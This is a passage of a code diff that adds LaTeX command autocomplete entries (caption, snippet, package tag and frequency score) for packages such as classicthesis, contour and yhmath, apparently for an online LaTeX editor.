'\\lim', + meta: 'bigints-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'bigints-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'bigints-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'bigints-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'bigints-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'bigints-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'bigints-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'bigints-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'bigints-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'bigints-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'bigints-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'bigints-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'bigints-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'bigints-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'bigints-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'bigints-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'bigints-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'bigints-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'bigints-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'bigints-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'bigints-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'bigints-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'bigints-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'bigints-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'bigints-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'bigints-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'bigints-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'bigints-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'bigints-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'bigints-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'bigints-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'bigints-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'bigints-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'bigints-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'bigints-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'bigints-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'bigints-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'bigints-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'bigints-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'bigints-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'bigints-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'bigints-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'bigints-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'bigints-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'bigints-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'bigints-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bigints-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'bigints-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'bigints-cmd', + score: 0.0063276692758974925, + }, + ], + classicthesis: [ + { + caption: '\\marginpar{}', + snippet: '\\marginpar{$1}', + meta: 'classicthesis-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\marginpar', + snippet: '\\marginpar', + meta: 'classicthesis-cmd', + score: 0.003400158497921723, + }, + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'classicthesis-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'classicthesis-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\spacedlowsmallcaps{}', + snippet: '\\spacedlowsmallcaps{$1}', + meta: 'classicthesis-cmd', + score: 0.002677188251799468, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'classicthesis-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'classicthesis-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'classicthesis-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\part{}', + snippet: '\\part{$1}', + meta: 'classicthesis-cmd', + score: 0.022180129487444723, + }, + { + caption: '\\tocEntry{}', + snippet: '\\tocEntry{$1}', + meta: 'classicthesis-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\graffito{}', + snippet: '\\graffito{$1}', + meta: 'classicthesis-cmd', + score: 1.1006799670632527e-5, + }, + { + caption: '\\chapter{}', + snippet: '\\chapter{$1}', + meta: 'classicthesis-cmd', + score: 0.422097569591803, + }, + { + caption: '\\spacedallcaps{}', + snippet: '\\spacedallcaps{$1}', + meta: 'classicthesis-cmd', + score: 0.0015281000475958944, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'classicthesis-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\myVersion', + snippet: '\\myVersion', + meta: 'classicthesis-cmd', + score: 0.00018029288638573757, + }, + { + caption: '\\ctparttext{}', + snippet: '\\ctparttext{$1}', + meta: 'classicthesis-cmd', + score: 1.8780276211096543e-5, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'classicthesis-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'classicthesis-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'classicthesis-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'classicthesis-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'classicthesis-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\bottomrule', + snippet: '\\bottomrule', + meta: 'classicthesis-cmd', + score: 0.04533364657852219, + }, + { + caption: '\\midrule', + snippet: '\\midrule', + meta: 'classicthesis-cmd', + score: 0.07098077735912875, + }, + { + caption: '\\addlinespace', + snippet: '\\addlinespace', + meta: 'classicthesis-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\addlinespace[]', + snippet: '\\addlinespace[$1]', + meta: 'classicthesis-cmd', + score: 0.005865460617491447, + }, + { + caption: '\\toprule', + snippet: '\\toprule', + meta: 'classicthesis-cmd', + score: 0.059857788139528495, + }, + { + caption: '\\titleclass{}{}[]', + snippet: '\\titleclass{$1}{$2}[$3]', + meta: 'classicthesis-cmd', + score: 0.00028979763314974667, + }, + { + caption: '\\titlelabel{}', + snippet: '\\titlelabel{$1}', + meta: 'classicthesis-cmd', + score: 6.40387839367932e-6, + }, + { + caption: '\\thetitle', + snippet: '\\thetitle', + meta: 'classicthesis-cmd', + score: 0.0015531478302713473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\titleformat{}{}{}{}{}[]', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}[$6]', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}[]{}{}{}{}', + snippet: '\\titleformat{$1}[$2]{$3}{$4}{$5}{$6}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}', + snippet: '\\titleformat{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titleformat{}{}{}{}{}', + snippet: '\\titleformat{$1}{$2}{$3}{$4}{$5}', + meta: 'classicthesis-cmd', + score: 0.03475519439740096, + }, + { + caption: '\\titlespacing{}{}{}{}', + snippet: '\\titlespacing{$1}{$2}{$3}{$4}', + meta: 'classicthesis-cmd', + score: 0.023062744385192156, + }, + { + caption: '\\markboth{}{}', + snippet: '\\markboth{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markboth{}', + snippet: '\\markboth{$1}', + meta: 'classicthesis-cmd', + score: 0.038323601301945065, + }, + { + caption: '\\markright{}', + snippet: '\\markright{$1}', + meta: 'classicthesis-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\markright{}{}', + snippet: '\\markright{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.007138622674767024, + }, + { + caption: '\\filleft', + snippet: '\\filleft', + meta: 'classicthesis-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\filcenter', + snippet: '\\filcenter', + meta: 'classicthesis-cmd', + score: 0.0004835660211260246, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 'classicthesis-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\cleardoublepage', + snippet: '\\cleardoublepage', + meta: 'classicthesis-cmd', + score: 0.044016804142963585, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'classicthesis-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\chaptertitlename', + snippet: '\\chaptertitlename', + meta: 'classicthesis-cmd', + score: 0.0016985007766926272, + }, + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'classicthesis-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\filright', + snippet: '\\filright', + meta: 'classicthesis-cmd', + score: 7.959989906732799e-5, + }, + { + caption: '\\titlerule', + snippet: '\\titlerule', + meta: 'classicthesis-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\titlerule[]{}', + snippet: '\\titlerule[$1]{$2}', + meta: 'classicthesis-cmd', + score: 0.019273712561461216, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'classicthesis-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'classicthesis-cmd', + score: 2.341195220791228, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'classicthesis-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'classicthesis-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'classicthesis-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'classicthesis-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'classicthesis-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'classicthesis-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'classicthesis-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'classicthesis-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\lsstyle', + snippet: '\\lsstyle', + meta: 'classicthesis-cmd', + score: 0.0023367519914345774, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'classicthesis-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\DisableLigatures[]{}', + snippet: '\\DisableLigatures[$1]{$2}', + meta: 'classicthesis-cmd', + score: 0.0009805246614299932, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'classicthesis-cmd', + score: 0.00021116765384691477, + }, + ], + expl3: [ + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'expl3-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'expl3-cmd', + score: 0.2864294797053033, + }, + ], + 'pst-plot': [ + { + caption: '\\green', + snippet: '\\green', + meta: 'pst-plot-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\green{}', + snippet: '\\green{$1}', + meta: 'pst-plot-cmd', + score: 0.0016005722621532548, + }, + { + caption: '\\documentclass[]{}', + snippet: '\\documentclass[$1]{$2}', + meta: 'pst-plot-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\documentclass{}', + snippet: '\\documentclass{$1}', + meta: 'pst-plot-cmd', + score: 1.4425339817971206, + }, + { + caption: '\\gray', + snippet: '\\gray', + meta: 'pst-plot-cmd', + score: 0.0005786730478266738, + }, + { + caption: '\\red{}', + snippet: '\\red{$1}', + meta: 'pst-plot-cmd', + score: 0.006520475264573554, + }, + { + caption: '\\red', + snippet: '\\red', + meta: 'pst-plot-cmd', + score: 0.006520475264573554, + }, + ], + chemarrow: [ + { + caption: '\\chemarrow', + snippet: '\\chemarrow', + meta: 'chemarrow-cmd', + score: 0.0005176077206367611, + }, + ], + prettyref: [ + { + caption: '\\newrefformat{}{}', + snippet: '\\newrefformat{$1}{$2}', + meta: 'prettyref-cmd', + score: 0.001373625900102228, + }, + { + caption: '\\prettyref{}', + snippet: '\\prettyref{$1}', + meta: 'prettyref-cmd', + score: 0.005783541047730358, + }, + ], + versions: [ + { + caption: '\\includeversion{}', + snippet: '\\includeversion{$1}', + meta: 'versions-cmd', + score: 0.0028410409433993543, + }, + { + caption: '\\excludeversion{}', + snippet: '\\excludeversion{$1}', + meta: 'versions-cmd', + score: 0.001742562336270228, + }, + { + caption: '\\processifversion{}{}', + snippet: '\\processifversion{$1}{$2}', + meta: 'versions-cmd', + score: 0.0022991412707353805, + }, + ], + contour: [ + { + caption: '\\contour{}{}', + snippet: '\\contour{$1}{$2}', + meta: 'contour-cmd', + score: 0.0008245159401597211, + }, + { + caption: '\\contourlength{}', + snippet: '\\contourlength{$1}', + meta: 'contour-cmd', + score: 8.130187059343861e-5, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'contour-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'contour-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'contour-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'contour-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'contour-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'contour-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'contour-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'contour-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'contour-cmd', + score: 0.008565354665444157, + }, + ], + xintexpr: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xintexpr-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xintexpr-cmd', + score: 0.021170869458413965, + }, + ], + tocstyle: [ + { + caption: '\\usetocstyle{}', + snippet: '\\usetocstyle{$1}', + meta: 'tocstyle-cmd', + score: 3.2405622997778076e-6, + }, + ], + bigdelim: [ + { + caption: '\\multirow{}{}{}', + snippet: '\\multirow{$1}{$2}{$3}', + meta: 'bigdelim-cmd', + score: 0.07525389638751734, + }, + { + caption: '\\multirow{}[]{}{}', + snippet: '\\multirow{$1}[$2]{$3}{$4}', + meta: 'bigdelim-cmd', + score: 0.07525389638751734, + }, + ], + eulervm: [ + { + caption: '\\big', + snippet: '\\big', + meta: 'eulervm-cmd', + score: 0.05613164277964739, + }, + ], + xr: [ + { + caption: '\\externaldocument{}', + snippet: '\\externaldocument{$1}', + meta: 'xr-cmd', + score: 0.0008648763879096798, + }, + ], + yhmath: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'yhmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'yhmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'yhmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'yhmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'yhmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'yhmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'yhmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'yhmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'yhmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'yhmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'yhmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'yhmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'yhmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'yhmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'yhmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'yhmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'yhmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'yhmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'yhmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'yhmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'yhmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'yhmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'yhmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'yhmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'yhmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'yhmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'yhmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'yhmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'yhmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'yhmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'yhmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'yhmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'yhmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'yhmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'yhmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'yhmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'yhmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'yhmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'yhmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'yhmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'yhmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'yhmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'yhmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'yhmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'yhmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'yhmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'yhmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'yhmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'yhmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'yhmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'yhmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'yhmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'yhmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'yhmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'yhmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'yhmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'yhmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'yhmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'yhmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'yhmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'yhmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'yhmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'yhmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'yhmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'yhmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'yhmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'yhmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'yhmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'yhmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'yhmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'yhmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'yhmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'yhmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'yhmath-cmd', + score: 